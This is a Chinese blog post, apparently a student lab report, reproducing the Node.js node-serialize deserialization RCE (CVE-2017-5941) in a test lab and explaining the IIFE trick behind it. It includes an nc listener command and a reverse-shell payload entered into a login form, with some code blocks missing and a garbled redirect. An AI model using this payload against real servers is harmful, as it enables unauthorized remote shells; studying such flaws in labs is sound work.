Node.js 反序列化漏洞远程执行代码(CVE-2017-5941)

2 Node.js 反序列化漏洞远程执行代码(CVE-2017-5941)

2.1 摘要

2.1.1 漏洞介绍

  • 漏洞名称: Exploiting Node.js deserialization bug for Remote Code Execution
  • 漏洞CVE id: CVE-2017-594
  • 漏洞类型: 代码执行
  • Node.js存在反序列化远程代码执行漏洞,若不可信的数据传入unserrialize()函数,通过传递立即调用函数表达式(IIFE)的JavaScript对象可以实现任意代码执行。并且Node.js服务端必须存在接收序列的数据接口

2.1.2 漏洞环境

  • 操作机:Kali Linux
  • 目标机:CentOS 6.5

2.1.3 实验工具

  • exp.txt:利用nodejs代码执行的代码文件。

2.2 漏洞复现

  • 首先访问目标机器http://172.16.12.2可以看到一个存在node.js漏洞的登录界面。

  • 使用nc监听本地端口,用于接收漏洞环境的反弹Shell. nc -lv -p 8080 即监听本机8080端口

  • 准备反序列化代码:_$$ND_FUNC$$_function (){require('child_process').exec('mknod backpipe p; nc <ip> <port> 0<backpipe | /bin/bash ]>backpipe')}(),修改里面的 ,修改为本机IP和NC监听的端口号:_$$ND_FUNC$$_function (){require('child_process').exec('mknod backpipe p; nc <172.16.11.2> <8080> 0<backpipe | /bin/bash ]>backpipe')}(),修改后复制该代码,去尝试到登录界面利用。

  • 用户名任意输入,将修改好的反序列化代码复制到密码框点击登录即可。
    点击登录后,如下图所示:利用成功。

  • 已经反弹回一个shell,并且权限为root。

2.3 漏洞分析

  • 使用0.0.4版本的node-serialize进行研究,成功利用的话,不可信输入传递到 unserialize()的时候可以执行任意代码。创建Payload最好使用同一模块的serialize()函数。 创建以下 JavaScript 对象,将其传入 serialize() 函数。

  • 运行后得到以下输出:

  • 得到序列化的字符串,可以通过unserialize()函数进行反序列化,但问题是代码执行不会发生,直到触发对应于对象的rce属性的函数。可以使用JavaScript的立即调用函数表达式(IIFE)来调用该函数。如果在函数体之后使用括号(),当对象被创建时,函数将被调用。 它的工作方式类似于C ++中的类构造函数。现在修改过的代码经 serialize() 函数马上会被调用。

  • 运行后得到以下输出:

  • 成功执行,那么就有了下面的 exploit:

  • 将其传入unserialize() 函数,触发代码执行。

  • 运行后得到以下输出:

2.4 修复方案

2.5 思考总结

  • 本实践实现了Node.js 反序列化漏洞远程执行代码的复现,并对漏洞原理进行了详细的分析。该漏洞本质上是构造Payload传入unserrialize()函数进行反序列化:使用JavaScript的立即调用函数表达式(IIFE),当对象被创建时,将 该JavaScript 对象传入 serialize() 函数,输出exploit将其传入unserialize() 函数,可以实现任意代码执行。危害不容小觑。
posted @ 2017-06-15 21:38  20145312袁心  阅读(3837)  评论(0编辑  收藏  举报